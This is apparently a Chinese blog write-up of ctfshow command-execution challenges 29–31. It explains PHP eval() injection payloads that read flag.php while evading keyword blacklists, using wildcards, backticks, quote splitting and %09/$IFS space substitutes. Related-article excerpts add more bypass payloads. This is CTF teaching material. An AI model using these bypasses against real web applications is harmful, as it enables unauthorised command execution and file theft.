ctfshow web入门 命令执行部分(29-31)

最新推荐文章于 2025-08-13 17:37:52 发布
原创 最新推荐文章于 2025-08-13 17:37:52 发布 · 2.4k 阅读 · 10 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

大佬请自行忽略讲解部分,讲解针对新手。知识点源自payload的构造。大部分flag需要右键查看源码获得

29

知识点:通配符

payload:c=system('cat f*');
在linux系统中 有一些通配符

*	匹配任何字符串/文本,包括空字符串;*代表任意字符(0个或多个) ls file *
?	匹配任何一个字符(不在括号内时)?代表任意1个字符 ls file 0
[abcd]	匹配abcd中任何一个字符
[a-z]	表示范围a到z,表示范围的意思 []匹配中括号中任意一个字符 ls file 0

我们想要执行 cat flag.php,但是flag被过滤了,这时候就可以使用通配符
cat f*表示打开当前目录下所有 f开头的文件

再补充一下:
对于linux cat和ca''t ca\t ca""t效果是相同的 这样同样可以绕过字符的限制
比如 c=system('ca\t fla\g.php');

30

知识点:反引号执行系统命令

payload:c=echo `cat f*`;

因为过滤了system,我们就得选择其他的命令执行函数了
常见的有如下几个,其中system是有回显的,其他的就得需要我们自行输出。调用echo或者其他输出函数即可。

system()
passthru()
exec()
shell_exec()
popen()
proc_open()
pcntl_exec()
反引号 同shell_exec()

31

知识点:空格过滤+cat过滤绕过

payload:c=echo(`more%09f*`);

在linux 空格可以用以下字符串代替:

%09(tab)、$IFS$9、 ${IFS}、$IFS%09(tab)、< 、<>、%20(space)等

在使用带有$的内容替换时,要注意转义,因为$在php中有特殊含义
在这里插入图片描述
在linux中与cat有类似功能的有如下字符
cat、tac、more、less、head、tail、nl、sed、sort、uniq、rev
找到一个替换的即可。

CTFshow 命令执行 web29 30 31
ChenD的学习笔记
11-08 1930
CTFshow 命令执行 web29 web30 web31
CTFshow 命令执行 web31
Kradress的博客
10-29 359
查看源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 00:49:10 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); if(isset($_GET['c']
ctfshow-web入门-命令执行-web31
HkD01L的博客
06-24 1128
ctfshow,命令执行web31
ctfshow 命令执行
m0_74097148的博客
05-21 5076
dev/null文件可以被看作是一个“黑洞”文件。它等价于一个只写的的文件。所有写入它的内容都会永远丢失(因为不可读)。这里说flag在36.php中,那么我们想办法构造处36即可.这里参考大佬的做法。/dev/null 2>&1主要意思是不进行回显,让命令回显,我们进行命令分隔。如下图第一个元素为点号。
Ctfshow web-web31
qq_45427131的博客
05-16 418
首先查看源代码,还是preg_match函数,这次过滤了 flag|system|php|cat|sort|shell|.| |’ 这次过滤了以上函数 多了对单引号的过滤,单引号的过滤是小问题,因为 <?php eval($_POST['a']);?>中单引号是可有可无的 <?php eval($_POST['a']);?> = <?php eval($_POST[a]);?> 而对于system的过滤,则可以用其他php的命令执行函数代替,比如passthru 构造
CTFshow web入门 web29-------web56 命令执行wp
2202_75289892的博客
07-30 1089
过滤了flag,可见是文件名过滤,需要查看flag.php 或者flag.txt等文件。此外 读取文件利用cat函数,输出利用system、passthru。3.双引号绕过 fl''ag''.php。2.反斜杠绕过 fl\ag.php。1.通配符绕过 fla?还有特殊变量$1、内联执行等。
CTFshow web入门 web57------- web77命令执行wp
2202_75289892的博客
08-06 728
过滤了数字字母以及一些符号,输入参数c,题目提示了flag在36.php,由于输入参数后添加了cat c.php,只需要输入36即可,但数字被过滤。$((~ $(())))=-1 对其取反。因此可以37个 -1相加,再取反。
Ctfshow Web入门 命令执行 Web31-74
qq_45427131的博客
10-21 3204
CtfShow Web入门-命令执行 感谢Y4师傅!看Y4的Wp真的学到好多! Web31 过滤条件: flag\system\php\cat\sort\shell\小数点\空格\单引号 执行passthru()查看flag 绕过cat使用tac more less head tac tail nl od(二进制查看) vi vim sort uniq 绕过空格用%09 <> ${IFS} $IFS$9 {cat,fl*} %20 flag绕过可以用通符代替 执行echo查看flag echo
ctfshow web入门 web29-40 命令执行-1
最新发布
Azure_lyn的博客
08-13 820
本人初学,如有错误欢迎批评指正~
CTFSHOW-WEB入门-命令执行29-32
2301_80024722的博客
01-29 883
【代码】CTFSHOW-WEB入门-命令执行29-32。
CTFSHOW web入门——web31
m0_74093152的博客
04-23 337
过滤了flag、system、php、cat、sort、shell、\. 、空格。因此构造payload:?
ctfshow-web31(命令执行)
m0_62094846的博客
01-21 601
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 00:49:10 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); if(isset($_GET['c'])){..
ctfshow-web入门-命令执行web29)五种解法绕过文件名检测
Welcome To My6n Blog
06-06 1086
它的 payload 里用到了两个连续的单引号,在一些系统中,连续的两个单引号会被解释为一个单引号,而不会被视为字符串的结尾,从而使得字符串拼接在一起。因此,"fl''ag.php" 被解释为 "flag.php",从而绕过对文件名的检测。第一题代码很简单,就是对 preg_match 绕过,只要提交的参数值不出现 flag 就行。这条命令的作用是输出指定文件的内容,并在每一行前面加上行号。可以看到 flag 就在当前目录下,叫 flag.php。写入成功,这里还是测了一会儿才弄好,注意对单引号的转义。
CTFshow命令执行31
a861511690的博客
06-11 223
error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 显然对空格单引号都进行了过滤,命令执行有四个函数我们可以使用passthru() 并将’ '替换为"
CTFShow 命令执行
paidx0
06-11 1330
web29 error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 题目过滤了flag,相当于什么也没过滤,姿势就有很多了 payload1:c=system("nl fla?????"); payload2:c=system("
CTFshow 命令执行
xian653617125的博客
05-16 824
web 39 看代码是过滤了输入的限制,不能输flag,我们可以在include里面利用伪协议data://text/plain,后面的语句会被当做php代码来执行,因为我们在前面已经闭合了php的代码所有后面的.php并不影响(但我不太懂.php会被怎么样,请师傅们帮我解解惑) 如图所示 .php直接被显示到了页面上,我们也得到了flag的文件名,然后我们利用system执行命令 最后就可以得到flag了,但是记得因为过滤了flag所以我们用?来代替一个字符。 web40 过滤了 ...
ctfshow-命令执行
m0_72125469的博客
09-10 2412
方法3 比较经典 这是一个上传文件的模版 向指定url的服务器上传文件 然后服务器会自动将上传的文件放置指定目录 在linux里面临时存放文件的目录可能会被定时删除 这个目录是/tmp,然后一般网页文件会命名为php?因为,${RANDOM}可以出现4或5,可以构造/?echo $((${##}${##}+${##}${##}+${##}${##}+${##}+${##}+${##})) 也是36。
CTFSHOW 命令执行
asmartrman的博客
09-27 2489
ctfshow-web入门-命令执行板块(持续更新)
ctfshow web入门命令执行41
01-25
### CTFShow Web 入门命令执行挑战解析 在处理CTFShow平台中的Web类别入门级别命令执行挑战时,理解如何利用PHP代码注入来实现远程命令执行(RCE)至关重要。通过分析给定的参数传递方式以及服务器端脚本的行为模式,可以找到绕过简单过滤机制的方法。 对于此类题目,通常会提供一个带有漏洞的应用程序接口,允许攻击者通过特定输入点提交恶意数据。在这个例子中,存在两个主要入口用于测试:一个是基于URL查询字符串的方式;另一个则是表单POST请求方法[^3]。 #### 利用PHP函数进行命令执行 当遇到能够控制部分PHP源码的情况时,可以通过精心构造payload触发底层操作系统指令调用。例如,在给出的例子中有如下形式: ```php <?php echo `ls`; ?> ``` 这段代码会在当前工作目录下执行Linux/Unix系统的`ls`命令并显示其输出结果。为了进一步探索文件结构或读取敏感信息,可替换为其他有用的操作系统命令组合,如`cat`、`find`等。 针对此题目的具体场景,如果目标是获取某个特定PHP文件的内容,则可以根据上下文调整上述模板以适应实际需求。比如要逆向打印整个`ctfshow.php`文件内容,可以构建这样的HTTP GET请求: ``` ?v1=1&v2=system("tac%20ctfshow.php")/* ``` 这里使用了GNU/Linux特有的`tac`工具代替常见的`cat`命令,从而实现了从最后一行到第一行反序展示文本的效果。同时注意到了SQL注释符`/* */`的存在,这有助于屏蔽掉后续不必要的字符干扰。 另外一种常见技巧涉及直接访问内部变量状态,这对于调试和信息收集非常有帮助。假设想要查看名为`$ctfshow`的数据项详情,那么就可以发送类似下面所示的链接地址: ``` ?v1=1&v2=var_dump($ctfshow); ``` 这种方法依赖于PHP内置诊断功能——`var_dump()`函数,它能清晰地呈现出传入表达式的类型及其值。 #### 绕过基本防护措施 尽管某些情况下可能存在简单的正则表达式匹配型WAF(Web Application Firewall),但只要掌握了它们的工作原理就很容易规避这些限制。观察提供的WAF检测逻辑可知,主要是对一些关键字进行了黑名单过滤[^4]。因此,在设计最终有效载荷之前应当仔细考虑怎样巧妙避开那些被监控的关键字列表。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yu22x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值